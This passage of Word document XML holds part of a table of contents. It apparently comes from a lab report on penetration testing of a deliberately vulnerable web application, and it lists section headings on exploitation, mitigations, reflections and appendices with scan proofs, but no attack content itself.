              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851430" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation, Malware and Social Engineering</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851430 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ADF2CE7" w14:textId="15EA24FF" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851431" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mitigations and Hardening Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851431 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6ECA7A33" w14:textId="7CE0E039" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851432" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Evaluation, Limitations, and Reflection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851432 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68BEE006" w14:textId="57351564" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851433" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What Worked Well</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851433 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DA53CCA" w14:textId="6D727824" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851434" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What Failed and Why</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851434 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4719FFD4" w14:textId="21349342" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851435" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Limitations of the Lab Setup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851435 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B7837F7" w14:textId="5FB8F536" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851436" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Individual Reflections</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851436 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E07D14D" w14:textId="10FD5D1F" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851437" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851437 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CF55741" w14:textId="4E41FD1F" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851438" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851438 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B21421D" w14:textId="755A4510" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851439" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A: Virtual Machine Topology Diagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851439 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="152D411A" w14:textId="0C9C86AB" w:rsidR="005F415B" w:rsidRDefault="005F415B" w:rsidP="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851440" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix B: LAMP Stack Setup Instructions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851440 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0427523F" w14:textId="6FED5639" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851442" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix C: Target IP Discovery and Interface Configuration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851442 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="738AFF85" w14:textId="67D12A57" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851443" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix D: Damn Vulnerable Web Application Home Page</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851443 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="367979D8" w14:textId="111A1097" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851444" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix E: Nikto Automated Web Vulnerability Scan Proof</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851444 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D4415ED" w14:textId="4F493296" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851445" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix F: DIRB Directory Enumeration and Fuzzing Proof</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851445 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="680A29B8" w14:textId="4F8F801E" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
